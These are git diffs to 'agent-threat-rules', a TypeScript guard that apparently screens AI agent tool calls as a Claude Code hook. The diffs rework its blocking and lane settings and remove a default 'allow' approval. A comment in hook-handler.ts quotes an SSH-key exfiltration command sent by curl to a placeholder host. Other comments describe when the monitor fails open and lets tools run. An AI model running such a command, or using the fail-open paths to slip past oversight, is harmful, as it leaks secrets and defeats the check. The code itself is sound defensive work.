 export function resolveBlocking(
-  explicit?: boolean,
-  env: EnvSource = process.env
+  explicit: boolean | undefined,
+  env: EnvSource
 ): boolean {
-  if (explicit !== undefined) return explicit;
+  if (explicit !== undefined) {
+    if (typeof explicit !== 'boolean') {
+      throw new TypeError(
+        `Invalid blocking value ${JSON.stringify(explicit)} (${typeof explicit}). ` +
+          `Expected a boolean. Note that any non-empty string, including "false", ` +
+          `would otherwise enable blocking.`
+      );
+    }
+    return explicit;
+  }
 
   const fromEnv = env[BLOCKING_ENV_VAR];
   if (fromEnv !== undefined && fromEnv.trim() !== '') {
@@ -168,73 +220,123 @@ export function resolveBlocking(
 }
 
 /**
- * Same resolution, but never throws.
- *
- * WHY BOTH EXIST
- *
- * Throwing on a typo is right for an explicit invocation: `atr guard` should
- * refuse to start rather than run with an enforcement posture the operator did
- * not ask for. Silently reading `ATR_BLOCKING=enabled` as "off" is the worst
- * failure this module can produce.
- *
- * It is wrong for a library constructor. `new ATREngine()` inside the VS Code
- * extension, or `new ATRProcessor()` inside someone's Mastra pipeline, did not
- * ask to read the environment — the environment is ambient. A stray
- * `ATR_LANE=enfroce` in a shell profile should not crash an editor extension on
- * activation, and `ATR_BLOCKING=enabled` should not stop the guard from
- * starting at all, which is what it did: exit 1, nothing on stdout, no guard.
- * That lands hardest on the operator who was trying to turn enforcement ON.
- *
- * So: constructors warn loudly and fall back to the safe default; the CLI keeps
- * the throwing resolvers and formats the error itself. Loud is what stops this
- * being the silent fallback the throwing version exists to prevent.
- *
- * The warning is emitted once per distinct bad value per process, so a hook
- * invoked on every tool call does not turn stderr into a wall.
+ * An environment that is empty by construction. Library constructors resolve
+ * against this, so "the library does not read the environment" is enforced by
+ * the type system rather than by reviewer vigilance.
  */
-const warned = new Set<string>();
+const NO_ENV: EnvSource = Object.freeze({});
 
-function warnOnce(message: string): void {
-  if (warned.has(message)) return;
-  warned.add(message);
-  process.stderr.write(`[atr] ${message}\n`);
+/**
+ * Lane for a LIBRARY caller: explicit config, or the built-in default. Never
+ * reads the environment.
+ *
+ * @throws TypeError when the caller passes something that is not a lane.
+ */
+export function laneFromConfig(explicit?: Lane | string): Lane {
+  return resolveLane(explicit, NO_ENV);
 }
 
-/** Test seam: forget which warnings have already been emitted. */
-export function resetEnforcementWarnings(): void {
-  warned.clear();
+/**
+ * Blocking for a LIBRARY caller: explicit config, or off. Never reads the
+ * environment.
+ *
+ * @throws TypeError when the caller passes a non-boolean.
+ */
+export function blockingFromConfig(explicit?: boolean): boolean {
+  return resolveBlocking(explicit, NO_ENV);
 }
 
-export function resolveLaneOrWarn(
-  explicit?: Lane | string,
+/** The enforcement posture a CLI process will run under. */
+export interface EnforcementPolicy {
+  readonly lane: Lane;
+  readonly blocking: boolean;
+  /** Human-readable problems found while resolving. Empty on a clean read. */
+  readonly notes: readonly string[];
+}
+
+/**
+ * Resolve the posture for a CLI process: flag > environment > default.
+ *
+ * THE ONLY FUNCTION IN THIS PACKAGE THAT READS `process.env`.
+ *
+ * A bad FLAG is a usage error the CLI reports and exits on (see readLaneOption
+ * in cli.ts): it was typed by a person at a prompt who is looking at the exit
+ * code. A bad ENVIRONMENT VALUE is different, and this function degrades
+ * instead of throwing. That split was measured, not assumed.
+ *
+ * MEASUREMENT (Claude Code 2.1.76, hook dispatcher in the shipped binary)
+ * A `command` hook's exit status is mapped as:
+ *   status 0  -> `hook_success`; the renderer for that attachment returns null.
+ *   status 2  -> `hook_blocking_error`; stderr is shown AND the tool is blocked.
+ *   otherwise -> `hook_non_blocking_error`; the tool RUNS, the attachment maps
+ *                to [] for the model, and the renderer prints exactly
+ *                "<hookName> hook error" — the captured stderr is not shown.
+ *
+ * So for `atr guard`, which `atr init` installs as a PreToolUse command hook,
+ * exiting non-zero over a typo would: lose all detection for that call, let the
+ * tool run anyway, and tell the operator nothing beyond a bare "hook error".
+ * It buys no visibility at the cost of the entire product. The only loud exit
+ * status is 2 — which BLOCKS the tool, i.e. a stray shell variable would block
+ * every tool call. Both alternatives are worse than degrading.
+ *
+ * THE TRADE-OFF, STATED
+ * Degrading means an operator can believe enforcement is on when it is not.
+ * That is a real cost and it is why `notes` is not optional: the caller must
+ * print every note. It is accepted because the degraded posture is advisory —
+ * ATR emits no permission decision and dispatches no action above OBSERVE — so
+ * the failure mode is "ATR does not act", never "ATR acts wrongly". Exiting
+ * would produce "ATR does not act" too, and silently, minus the detection.
+ *
+ * WHY AN UNREADABLE LANE ALSO FORCES BLOCKING OFF
+ * Falling back to hunt while blocking is on is the one combination that makes
+ * the degraded posture MORE dangerous than the requested one: the operator
+ * asked to block on maturity=stable rules only, and would instead block on
+ * every maturity including draft. So when the requested lane cannot be honoured
+ * the process drops to advisory. An explicit `--blocking` does not override
+ * this: the flag says "you may block", not "block on a lane I never chose".
+ */
+export function resolveEnforcementPolicy(
+  flags: { readonly lane?: Lane | undefined; readonly blocking?: boolean | undefined } = {},
   env: EnvSource = process.env
-): Lane {
+): EnforcementPolicy {
+  const notes: string[] = [];
+
+  let lane: Lane;
+  let laneHonoured = true;
   try {
-    return resolveLane(explicit, env);
+    lane = resolveLane(flags.lane, env);
   } catch (error) {
-    if (explicit !== undefined) throw error; // caller's own bug, not ambient
-    warnOnce(
+    if (flags.lane !== undefined) throw error; // a flag is the caller's bug
+    laneHonoured = false;
+    lane = DEFAULT_LANE;
+    notes.push(
       `${(error as Error).message} Falling back to lane "${DEFAULT_LANE}". ` +
-        `Detection is unaffected; this only changes which maturities may fire.`
+        `Detection still runs; this only changes which maturities may fire.`
     );
-    return DEFAULT_LANE;
   }
-}
 
-export function resolveBlockingOrWarn(
-  explicit?: boolean,
-  env: EnvSource = process.env
-): boolean {
+  let blocking: boolean;
   try {
-    return resolveBlocking(explicit, env);
+    blocking = resolveBlocking(flags.blocking, env);
   } catch (error) {
-    if (explicit !== undefined) throw error;
-    warnOnce(
+    if (flags.blocking !== undefined) throw error;
+    blocking = DEFAULT_BLOCKING;
+    notes.push(
       `${(error as Error).message} Falling back to blocking=${DEFAULT_BLOCKING}. ` +
         `If you meant to enable enforcement, it is NOT enabled.`
     );
-    return DEFAULT_BLOCKING;
   }
+
+  if (!laneHonoured && blocking) {
+    blocking = false;
+    notes.push(
+      `Blocking disabled: ${LANE_ENV_VAR} could not be read, and blocking on the ` +
+        `fallback lane "${DEFAULT_LANE}" would enforce on more rule maturities ` +
+        `than you asked for. Fix ${LANE_ENV_VAR} to re-enable enforcement.`
+    );
+  }
+
+  return Object.freeze({ lane, blocking, notes: Object.freeze(notes) });
 }
 
 /**

--- a/src/engine.ts
+++ b/src/engine.ts
@@ -31,7 +31,8 @@ import { computeContentHash } from './content-hash.js';
 import { loadRulesFromDirectory, loadRuleFile } from './loader.js';
 import { evaluateTraceRule } from './trace-evaluator.js';
 import { evaluateSemanticRule } from './semantic-evaluator.js';
-import { laneAllows, requiresConfirm } from './quality/rule-contract.js';
+import { laneAllows, requiresConfirm, type Lane } from './quality/rule-contract.js';
+import { resolveLane } from './enforcement.js';
 import type { SessionTracker } from './session-tracker.js';
 import { computeVerdict } from './verdict.js';
 import type { ActionExecutor } from './action-executor.js';
@@ -216,6 +217,11 @@ export interface ATREngineConfig {
    *   'alert'   : maturity stable + test (analyst/correlation lane).
    *   'hunt'    : all maturities (advisory/eval; default, backward-compatible).
    * Deprecated/draft rules are always skipped regardless of lane.
+   *
+   * Resolution order is `lane` here > `ATR_LANE` in the environment > 'hunt'
+   * (src/enforcement.ts resolveLane). Leaving this undefined therefore does NOT
+   * pin the lane to 'hunt' — it defers to the operator's environment. An
+   * unrecognised value from either source throws at construction time.
    */
   lane?: 'enforce' | 'alert' | 'hunt';
   /**
@@ -232,6 +238,13 @@ export class ATREngine {
   private rules: ATRRule[] = [];
   private readonly compiledPatterns = new Map<string, Map<string, RegExp[]>>();
   private readonly semanticModuleInstance: SemanticModule | null;
+  /**
+   * Active detection lane, resolved ONCE at construction (config > env >
+   * 'hunt'). Held as a field rather than re-read per call so a mid-run
+   * environment mutation cannot move the lane underneath an in-flight
+   * evaluation — every gate in this engine sees the same lane for its lifetime.
+   */
+  private readonly lane: Lane;
 
   /**
    * Find bundled rules directory shipped with the npm package.
@@ -253,6 +266,10 @@ export class ATREngine {
   }
 
   constructor(private readonly config: ATREngineConfig = {}) {
+    // Resolve the lane at construction so an invalid config/env value fails
+    // fast here, not silently at the first evaluation.
+    this.lane = resolveLane(config.lane);
+
     // Initialize Layer 3 semantic module if config provided
     if (config.semanticModule) {
       const moduleConfig = createSemanticModuleFromConfig(config.semanticModule);
@@ -300,7 +317,12 @@ export class ATREngine {
   private passesLane(rule: ATRRule): boolean {
     // Single source of truth for the maturity->lane mapping (incl. safe-fail on
     // missing/odd maturity) lives in the rule-quality contract.
-    return laneAllows(rule.maturity, this.config.lane ?? 'hunt');
+    return laneAllows(rule.maturity, this.lane);
+  }
+
+  /** Active detection lane (config > ATR_LANE > 'hunt'). Diagnostics/tests. */
+  getLane(): Lane {
+    return this.lane;
   }
 
   /**
@@ -329,7 +351,7 @@ export class ATREngine {
    */
   evaluate(event: AgentEvent): ATRMatch[] {
     const matches = this.evaluateRaw(event);
-    const lane = this.config.lane ?? 'hunt';
+    const lane = this.lane;
     if (lane === 'hunt') return matches;
     return matches.filter((m) => !requiresConfirm(m.rule));
   }
@@ -1572,7 +1594,7 @@ export class ATREngine {
     // and the additive signal below (avoids a double encode). Computed lazily: the
     // enforce lane (no additive signal) only encodes when a confirm-rule actually
     // matched, so benign no-match events in the block lane stay encode-free.
-    const lane = this.config.lane ?? 'hunt';
+    const lane = this.lane;
     const hasConfirmMatch = lane !== 'hunt' && matches.some((m) => requiresConfirm(m.rule));
     const needEmbedding = lane !== 'enforce' || hasConfirmMatch;
     let embResult: { matched: boolean; value: number; description: string } | null = null;

--- a/src/engine.ts
+++ b/src/engine.ts
@@ -32,7 +32,7 @@ import { loadRulesFromDirectory, loadRuleFile } from './loader.js';
 import { evaluateTraceRule } from './trace-evaluator.js';
 import { evaluateSemanticRule } from './semantic-evaluator.js';
 import { laneAllows, requiresConfirm, type Lane } from './quality/rule-contract.js';
-import { resolveLane } from './enforcement.js';
+import { resolveLaneOrWarn } from './enforcement.js';
 import type { SessionTracker } from './session-tracker.js';
 import { computeVerdict } from './verdict.js';
 import type { ActionExecutor } from './action-executor.js';
@@ -268,7 +268,7 @@ export class ATREngine {
   constructor(private readonly config: ATREngineConfig = {}) {
     // Resolve the lane at construction so an invalid config/env value fails
     // fast here, not silently at the first evaluation.
-    this.lane = resolveLane(config.lane);
+    this.lane = resolveLaneOrWarn(config.lane);
 
     // Initialize Layer 3 semantic module if config provided
     if (config.semanticModule) {

--- a/src/engine.ts
+++ b/src/engine.ts
@@ -32,7 +32,7 @@ import { loadRulesFromDirectory, loadRuleFile } from './loader.js';
 import { evaluateTraceRule } from './trace-evaluator.js';
 import { evaluateSemanticRule } from './semantic-evaluator.js';
 import { laneAllows, requiresConfirm, type Lane } from './quality/rule-contract.js';
-import { resolveLaneOrWarn } from './enforcement.js';
+import { laneFromConfig } from './enforcement.js';
 import type { SessionTracker } from './session-tracker.js';
 import { computeVerdict } from './verdict.js';
 import type { ActionExecutor } from './action-executor.js';
@@ -218,10 +218,14 @@ export interface ATREngineConfig {
    *   'hunt'    : all maturities (advisory/eval; default, backward-compatible).
    * Deprecated/draft rules are always skipped regardless of lane.
    *
-   * Resolution order is `lane` here > `ATR_LANE` in the environment > 'hunt'
-   * (src/enforcement.ts resolveLane). Leaving this undefined therefore does NOT
-   * pin the lane to 'hunt' — it defers to the operator's environment. An
-   * unrecognised value from either source throws at construction time.
+   * This field is the ONLY input: the engine does not read `ATR_LANE` or any
+   * other environment variable. Leaving it undefined pins the lane to 'hunt',
+   * the widest and most advisory setting, no matter what the surrounding shell
+   * says. A CLI that wants environment support resolves it itself and passes
+   * the result here (src/cli.ts, resolveEnforcementPolicy).
+   *
+   * An unrecognised value throws at construction time — that is a caller bug,
+   * not ambient noise.
    */
   lane?: 'enforce' | 'alert' | 'hunt';
   /**
@@ -239,10 +243,9 @@ export class ATREngine {
   private readonly compiledPatterns = new Map<string, Map<string, RegExp[]>>();
   private readonly semanticModuleInstance: SemanticModule | null;
   /**
-   * Active detection lane, resolved ONCE at construction (config > env >
-   * 'hunt'). Held as a field rather than re-read per call so a mid-run
-   * environment mutation cannot move the lane underneath an in-flight
-   * evaluation — every gate in this engine sees the same lane for its lifetime.
+   * Active detection lane, resolved ONCE at construction from config alone.
+   * Held as a field so every gate in this engine sees the same lane for its
+   * lifetime.
    */
   private readonly lane: Lane;
 
@@ -266,9 +269,9 @@ export class ATREngine {
   }
 
   constructor(private readonly config: ATREngineConfig = {}) {
-    // Resolve the lane at construction so an invalid config/env value fails
-    // fast here, not silently at the first evaluation.
-    this.lane = resolveLaneOrWarn(config.lane);
+    // Config only — never the environment. An embedder's detection breadth must
+    // not depend on a variable someone exported in a shell profile.
+    this.lane = laneFromConfig(config.lane);
 
     // Initialize Layer 3 semantic module if config provided
     if (config.semanticModule) {
@@ -320,7 +323,7 @@ export class ATREngine {
     return laneAllows(rule.maturity, this.lane);
   }
 
-  /** Active detection lane (config > ATR_LANE > 'hunt'). Diagnostics/tests. */
+  /** Active detection lane (config, else 'hunt'). Diagnostics/tests. */
   getLane(): Lane {
     return this.lane;
   }

--- a/src/hook-handler.ts
+++ b/src/hook-handler.ts
@@ -7,7 +7,18 @@
  * Supports a stdio JSON-lines loop for use as a Claude Code hook process.
  *
  * CRITICAL: Fail-open on all errors -- default to "allow" so a
- * bug in the guard never blocks legitimate agent operations.
+ * bug in the guard never blocks legitimate agent operations. `failOpen: false`
+ * flips the internal verdict to deny, but note that a deny only reaches the host
+ * when blocking is enabled (below); in advisory mode a fail-closed guard error
+ * is still reported without a permissionDecision, because advisory mode's
+ * contract is "ATR never votes on permission".
+ *
+ * BLOCKING IS OPT-IN. By default this handler emits detection facts and no
+ * permission decision at all: the PreToolUse payload omits
+ * hookSpecificOutput.permissionDecision and the PostToolUse payload omits
+ * `decision: 'block'`, so Claude Code applies exactly the flow it would use with
+ * no hook installed. Turning blocking on restores the historical severity +
+ * confidence matrix verbatim. See src/enforcement.ts.
  *
  * @module agent-threat-rules/hook-handler
  */
@@ -21,15 +32,32 @@ import type {
 } from './types.js';
 import type { ATREngine } from './engine.js';
 import type { ActionExecutor } from './action-executor.js';
+import { resolveBlocking } from './enforcement.js';
 
 /** Default evaluation timeout in milliseconds */
 const DEFAULT_TIMEOUT_MS = 5_000;
+
+/** Options for the Claude Code contract mappers. */
+export interface HookContractOptions {
+  /**
+   * Emit a real permission decision. Defaults to FALSE (advisory): the payload
+   * carries ATR's findings but no permissionDecision / no `decision: 'block'`,
+   * leaving the host's own permission flow untouched.
+   */
+  readonly blocking?: boolean;
+}
 
 export interface HookHandlerConfig {
   readonly engine: ATREngine;
   readonly executor: ActionExecutor;
   readonly timeoutMs?: number;
   readonly failOpen?: boolean;
+  /**
+   * Operator directive permitting ATR to emit a blocking permission decision.
+   * OFF BY DEFAULT. Resolution order: this field > ATR_BLOCKING > false.
+   * Enabling it reproduces the pre-existing severity+confidence matrix exactly.
+   */
+  readonly blocking?: boolean;
 }
 
 /**
@@ -90,8 +118,32 @@ function hookInputToEvent(input: HookInput): AgentEvent {
  * contract. ATR fields are carried alongside under non-colliding keys for logs
  * and non-Claude-Code consumers; we deliberately do NOT emit a top-level
  * `decision` here, so Claude Code cannot misread a stray field.
+ *
+ * ADVISORY MODE (the default — `blocking` unset or false): permissionDecision is
+ * OMITTED, not downgraded. `permissionDecision: "allow"` is an affirmative
+ * approval in this contract: it suppresses the host's own permission prompt, so
+ * emitting it for a verdict ATR is not enforcing would make a tool the host
+ * would have asked about run silently instead. Omitting the field leaves the
+ * host on its own default path. permissionDecisionReason goes with it — a reason
+ * without a decision is not part of the contract — so the findings travel in the
+ * atr_* keys and, for `atr guard`, on stderr via the adapter's alert action.
  */
-export function toClaudeCodePreToolUse(output: HookOutput): Record<string, unknown> {
+export function toClaudeCodePreToolUse(
+  output: HookOutput,
+  options: HookContractOptions = {}
+): Record<string, unknown> {
+  const advisory = !(options.blocking ?? false);
+
+  if (advisory) {
+    return {
+      hookSpecificOutput: { hookEventName: 'PreToolUse' },
+      atr_advisory: true,
+      atr_decision: output.decision,
+      atr_reason: output.reason ?? output.message ?? '',
+      ...(output.matched_rules ? { matched_rules: output.matched_rules } : {}),
+    };
+  }
+
   return {
     hookSpecificOutput: {
       hookEventName: 'PreToolUse',
@@ -110,12 +162,23 @@ export function toClaudeCodePreToolUse(output: HookOutput): Record<string, unkno
  * tool output). A deny OR ask verdict blocks; allow passes. The generic ATR
  * decision is preserved under atr_decision to avoid colliding with Claude
  * Code's 'block' sentinel on the shared `decision` key.
+ *
+ * ADVISORY MODE (the default): `decision: 'block'` is omitted. There is no
+ * "allow" sentinel to downgrade to on this path — the absence of the key IS the
+ * pass-through — so advisory mode simply never sets it, and the findings still
+ * travel in atr_decision / atr_reason / matched_rules.
  */
-export function toClaudeCodePostToolUse(output: HookOutput): Record<string, unknown> {
-  const block = output.decision === 'deny' || output.decision === 'ask';
+export function toClaudeCodePostToolUse(
+  output: HookOutput,
+  options: HookContractOptions = {}
+): Record<string, unknown> {
+  const blocking = options.blocking ?? false;
+  const block = blocking && (output.decision === 'deny' || output.decision === 'ask');
   return {
     hookSpecificOutput: { hookEventName: 'PostToolUse' },
+    ...(blocking ? {} : { atr_advisory: true }),
     atr_decision: output.decision,
+    ...(blocking ? {} : { atr_reason: output.reason ?? output.message ?? '' }),
     ...(output.matched_rules ? { matched_rules: output.matched_rules } : {}),
     ...(block ? { decision: 'block', reason: output.reason ?? output.message ?? '' } : {}),
   };
@@ -154,12 +217,19 @@ export class HookHandler {
   private readonly executor: ActionExecutor;
   private readonly timeoutMs: number;
   private readonly failOpen: boolean;
+  private readonly blocking: boolean;
 
   constructor(config: HookHandlerConfig) {
     this.engine = config.engine;
     this.executor = config.executor;
     this.timeoutMs = config.timeoutMs ?? DEFAULT_TIMEOUT_MS;
     this.failOpen = config.failOpen ?? true;
+    this.blocking = resolveBlocking(config.blocking);
+  }
+
+  /** Is this handler permitted to emit a blocking permission decision? */
+  isBlocking(): boolean {
+    return this.blocking;
   }
 
   /**
@@ -207,8 +277,11 @@ export class HookHandler {
       if (!trimmed) continue;
 
       let output: HookOutput;
-      // Default to PreToolUse framing: on an unparseable line the error path
-      // fail-closes to a deny, and a deny must reach Claude Code as a real block.
+      // Default to PreToolUse framing: an unparseable line has no hook type, and
+      // PreToolUse is the only framing that can still influence the host before
+      // the tool runs. (The error path itself fail-OPENS to allow unless
+      // failOpen: false — see handleError; the header comment on this module is
+      // the accurate one.)
       let hookType: HookInput['hook'] = 'PreToolUse';
 
       try {
@@ -221,12 +294,13 @@ export class HookHandler {
 
       // Emit the host's exact hook contract. Generic { decision } is silently
       // ignored by Claude Code (fake protection) — see toClaudeCodePreToolUse.
+      const contractOptions = { blocking: this.blocking };
       const payload =
         format === 'generic'
           ? (output as unknown as Record<string, unknown>)
           : hookType === 'PostToolUse'
-            ? toClaudeCodePostToolUse(output)
-            : toClaudeCodePreToolUse(output);
+            ? toClaudeCodePostToolUse(output, contractOptions)
+            : toClaudeCodePreToolUse(output, contractOptions);
 
       process.stdout.write(JSON.stringify(payload) + '\n');
     }

--- a/src/hook-handler.ts
+++ b/src/hook-handler.ts
@@ -18,7 +18,11 @@
  * hookSpecificOutput.permissionDecision and the PostToolUse payload omits
  * `decision: 'block'`, so Claude Code applies exactly the flow it would use with
  * no hook installed. Turning blocking on restores the historical severity +
- * confidence matrix verbatim. See src/enforcement.ts.
+ * confidence matrix for deny and ask.
+ *
+ * It does NOT restore `permissionDecision: "allow"`, which no longer exists on
+ * any path: ATR emits a permission decision only to restrain an operation,
+ * never to approve one. See src/enforcement.ts.
  *
  * @module agent-threat-rules/hook-handler
  */
@@ -32,7 +36,7 @@ import type {
 } from './types.js';
 import type { ATREngine } from './engine.js';
 import type { ActionExecutor } from './action-executor.js';
-import { resolveBlockingOrWarn } from './enforcement.js';
+import { blockingFromConfig } from './enforcement.js';
 
 /** Default evaluation timeout in milliseconds */
 const DEFAULT_TIMEOUT_MS = 5_000;
@@ -40,9 +44,10 @@ const DEFAULT_TIMEOUT_MS = 5_000;
 /** Options for the Claude Code contract mappers. */
 export interface HookContractOptions {
   /**
-   * Emit a real permission decision. Defaults to FALSE (advisory): the payload
-   * carries ATR's findings but no permissionDecision / no `decision: 'block'`,
-   * leaving the host's own permission flow untouched.
+   * Emit a real permission decision for verdicts that restrain (deny / ask).
+   * Defaults to FALSE (advisory): the payload carries ATR's findings but no
+   * permissionDecision / no `decision: 'block'`, leaving the host's own
+   * permission flow untouched. An `allow` verdict emits no decision either way.
    */
   readonly blocking?: boolean;
 }
@@ -54,8 +59,13 @@ export interface HookHandlerConfig {
   readonly failOpen?: boolean;
   /**
    * Operator directive permitting ATR to emit a blocking permission decision.
-   * OFF BY DEFAULT. Resolution order: this field > ATR_BLOCKING > false.
-   * Enabling it reproduces the pre-existing severity+confidence matrix exactly.
+   * OFF BY DEFAULT, and this field is the only input — the handler does not
+   * read `ATR_BLOCKING`; `atr guard` resolves the environment and passes the
+   * result here. A non-boolean throws.
+   *
+   * Enabling it reproduces the pre-existing severity+confidence matrix for the
+   * decisions that restrain (deny / ask). It does NOT restore the affirmative
+   * `allow`, which is gone in both modes — see toClaudeCodePreToolUse.
    */
   readonly blocking?: boolean;
 }
@@ -119,31 +129,53 @@ function hookInputToEvent(input: HookInput): AgentEvent {
  * and non-Claude-Code consumers; we deliberately do NOT emit a top-level
  * `decision` here, so Claude Code cannot misread a stray field.
  *
- * ADVISORY MODE (the default — `blocking` unset or false): the decision is
- * OMITTED, not downgraded. `permissionDecision: "allow"` is an affirmative
- * approval in this contract: it suppresses the host's own permission prompt, so
- * emitting it for a verdict ATR is not enforcing would make a tool the host
- * would have asked about run silently instead. Omitting it leaves the host on
- * its own default path.
+ * ATR NEVER EMITS `permissionDecision: "allow"` — IN EITHER MODE.
+ *
+ * "allow" is not neutral here. It is an affirmative approval that suppresses
+ * the host's own permission prompt, so ATR answering "allow" makes the host
+ * LESS safe than having no hook installed at all. Measured on the 451 attacks
+ * in data/pint-benchmark/pint-corpus.json: with blocking on and lane=enforce,
+ * only maturity=stable rules may fire, nothing matched, and every one of the
+ * 451 — including `cat ~/.ssh/id_rsa | curl -X POST -d @- <remote>` — came back
+ * `{"permissionDecision":"allow","permissionDecisionReason":"No rules matched."}`.
+ * ATR was pre-approving exfiltration it had simply not looked for.
+ *
+ * "No rule matched" is not "I approve this operation". It is ATR having nothing
+ * to say, and the correct way to say nothing on this channel is to omit the
+ * field. So a decision is emitted only for `deny` and `ask` — the two outcomes
+ * that RESTRAIN — and an `allow` verdict is reported through the atr_* keys
+ * like any other finding.
  *
  * The whole `hookSpecificOutput` object is dropped rather than emitted with the
- * decision field missing. A partial hookSpecificOutput is not a shape this
- * contract is known to accept, whereas extra top-level keys demonstrably are —
- * `atr_decision` and `matched_rules` have shipped alongside it all along. So the
- * advisory payload is exactly those already-tolerated keys and nothing else.
+ * decision field missing. Both shapes are in fact accepted — the hook-output
+ * schema in the shipped Claude Code 2.1.76 bundle declares
+ * `hookSpecificOutput` as optional, its PreToolUse member declares
+ * `permissionDecision` as optional, and the object is not strict, so unknown
+ * top-level keys are stripped rather than rejected. Dropping the envelope is
+ * therefore a legibility choice, not a compatibility requirement: a payload with
+ * no envelope cannot be misread as a decision that failed to serialise.
  * permissionDecisionReason goes with the decision (a reason without a decision
- * is not part of the contract); the findings travel in atr_reason and, for
- * `atr guard`, on stderr via the adapter's alert action.
+ * says nothing); the findings travel in atr_reason and, for `atr guard`, on
+ * stderr via the adapter's alert action.
+ *
+ * `atr_advisory: true` marks the mode, not the verdict: it is present when
+ * blocking is off, and absent when blocking is on and this particular verdict
+ * simply had nothing to restrain.
  */
 export function toClaudeCodePreToolUse(
   output: HookOutput,
   options: HookContractOptions = {}
 ): Record<string, unknown> {
-  const advisory = !(options.blocking ?? false);
+  const blocking = options.blocking ?? false;
 
-  if (advisory) {
+  // ATR speaks on this channel only to RESTRAIN. `deny` and `ask` are the two
+  // decisions that hold an operation back; `allow` is the one that pushes it
+  // through, and ATR has no business emitting it — see the note above.
+  const restrains = output.decision === 'deny' || output.decision === 'ask';
+
+  if (!blocking || !restrains) {
     return {
-      atr_advisory: true,
+      ...(blocking ? {} : { atr_advisory: true }),
       atr_hook_event: 'PreToolUse',
       atr_decision: output.decision,
       atr_reason: output.reason ?? output.message ?? '',
@@ -170,10 +202,15 @@ export function toClaudeCodePreToolUse(
  * decision is preserved under atr_decision to avoid colliding with Claude
  * Code's 'block' sentinel on the shared `decision` key.
  *
- * ADVISORY MODE (the default): `decision: 'block'` is omitted. There is no
- * "allow" sentinel to downgrade to on this path — the absence of the key IS the
- * pass-through — so advisory mode simply never sets it, and the findings still
- * travel in atr_decision / atr_reason / matched_rules.
+ * NO AFFIRMATIVE-APPROVAL PATH EXISTS HERE, and that was checked rather than
+ * assumed when the PreToolUse `allow` was removed. This contract has exactly
+ * one sentinel, `decision: 'block'`; the absence of the key IS the pass-through.
+ * There is no value this function could set that would suppress a host
+ * behaviour, so the only rule to keep is the one already in force: set the
+ * sentinel for deny/ask when blocking is on, and never otherwise.
+ *
+ * ADVISORY MODE (the default): the sentinel is never set, and the findings
+ * still travel in atr_decision / atr_reason / matched_rules.
  */
 export function toClaudeCodePostToolUse(
   output: HookOutput,
@@ -231,7 +268,7 @@ export class HookHandler {
     this.executor = config.executor;
     this.timeoutMs = config.timeoutMs ?? DEFAULT_TIMEOUT_MS;
     this.failOpen = config.failOpen ?? true;
-    this.blocking = resolveBlockingOrWarn(config.blocking);
+    this.blocking = blockingFromConfig(config.blocking);
   }
 
   /** Is this handler permitted to emit a blocking permission decision? */

--- a/src/hook-handler.ts
+++ b/src/hook-handler.ts
@@ -119,14 +119,21 @@ function hookInputToEvent(input: HookInput): AgentEvent {
  * and non-Claude-Code consumers; we deliberately do NOT emit a top-level
  * `decision` here, so Claude Code cannot misread a stray field.
  *
- * ADVISORY MODE (the default — `blocking` unset or false): permissionDecision is
+ * ADVISORY MODE (the default — `blocking` unset or false): the decision is
  * OMITTED, not downgraded. `permissionDecision: "allow"` is an affirmative
  * approval in this contract: it suppresses the host's own permission prompt, so
  * emitting it for a verdict ATR is not enforcing would make a tool the host
- * would have asked about run silently instead. Omitting the field leaves the
- * host on its own default path. permissionDecisionReason goes with it — a reason
- * without a decision is not part of the contract — so the findings travel in the
- * atr_* keys and, for `atr guard`, on stderr via the adapter's alert action.
+ * would have asked about run silently instead. Omitting it leaves the host on
+ * its own default path.
+ *
+ * The whole `hookSpecificOutput` object is dropped rather than emitted with the
+ * decision field missing. A partial hookSpecificOutput is not a shape this
+ * contract is known to accept, whereas extra top-level keys demonstrably are —
+ * `atr_decision` and `matched_rules` have shipped alongside it all along. So the
+ * advisory payload is exactly those already-tolerated keys and nothing else.
+ * permissionDecisionReason goes with the decision (a reason without a decision
+ * is not part of the contract); the findings travel in atr_reason and, for
+ * `atr guard`, on stderr via the adapter's alert action.
  */
 export function toClaudeCodePreToolUse(
   output: HookOutput,
@@ -136,8 +143,8 @@ export function toClaudeCodePreToolUse(
 
   if (advisory) {
     return {
-      hookSpecificOutput: { hookEventName: 'PreToolUse' },
       atr_advisory: true,
+      atr_hook_event: 'PreToolUse',
       atr_decision: output.decision,
       atr_reason: output.reason ?? output.message ?? '',
       ...(output.matched_rules ? { matched_rules: output.matched_rules } : {}),

--- a/src/hook-handler.ts
+++ b/src/hook-handler.ts
@@ -32,7 +32,7 @@ import type {
 } from './types.js';
 import type { ATREngine } from './engine.js';
 import type { ActionExecutor } from './action-executor.js';
-import { resolveBlocking } from './enforcement.js';
+import { resolveBlockingOrWarn } from './enforcement.js';
 
 /** Default evaluation timeout in milliseconds */
 const DEFAULT_TIMEOUT_MS = 5_000;
@@ -231,7 +231,7 @@ export class HookHandler {
     this.executor = config.executor;
     this.timeoutMs = config.timeoutMs ?? DEFAULT_TIMEOUT_MS;
     this.failOpen = config.failOpen ?? true;
-    this.blocking = resolveBlocking(config.blocking);
+    this.blocking = resolveBlockingOrWarn(config.blocking);
   }
 
   /** Is this handler permitted to emit a blocking permission decision? */

--- a/src/index.ts
+++ b/src/index.ts
@@ -106,7 +106,8 @@ export type { HookHandlerConfig, HookContractOptions } from './hook-handler.js';
 //
 // Library callers want laneFromConfig / blockingFromConfig: they take an
 // explicit value and cannot read the environment. resolveEnforcementPolicy is
-// the CLI entry point and is the only function here that touches process.env —
+// the CLI entry point and is the only function that reads process.env for the
+// lane and blocking switches (other modules read it for unrelated settings) —
 // resolveLane / resolveBlocking require an EnvSource argument, so nothing else
 // can reach it by accident.
 export {

--- a/src/index.ts
+++ b/src/index.ts
@@ -106,6 +106,9 @@ export type { HookHandlerConfig, HookContractOptions } from './hook-handler.js';
 export {
   resolveLane,
   resolveBlocking,
+  resolveLaneOrWarn,
+  resolveBlockingOrWarn,
+  resetEnforcementWarnings,
   parseLane,
   parseBooleanFlag,
   isEnforcementAction,

--- a/src/index.ts
+++ b/src/index.ts
@@ -98,8 +98,23 @@ export { ActionExecutor } from './action-executor.js';
 export type { ActionExecutorConfig } from './action-executor.js';
 export { DefaultAdapter } from './adapters/default-adapter.js';
 export { StdioAdapter } from './adapters/stdio-adapter.js';
-export { HookHandler } from './hook-handler.js';
-export type { HookHandlerConfig } from './hook-handler.js';
+export { HookHandler, toClaudeCodePreToolUse, toClaudeCodePostToolUse } from './hook-handler.js';
+export type { HookHandlerConfig, HookContractOptions } from './hook-handler.js';
+
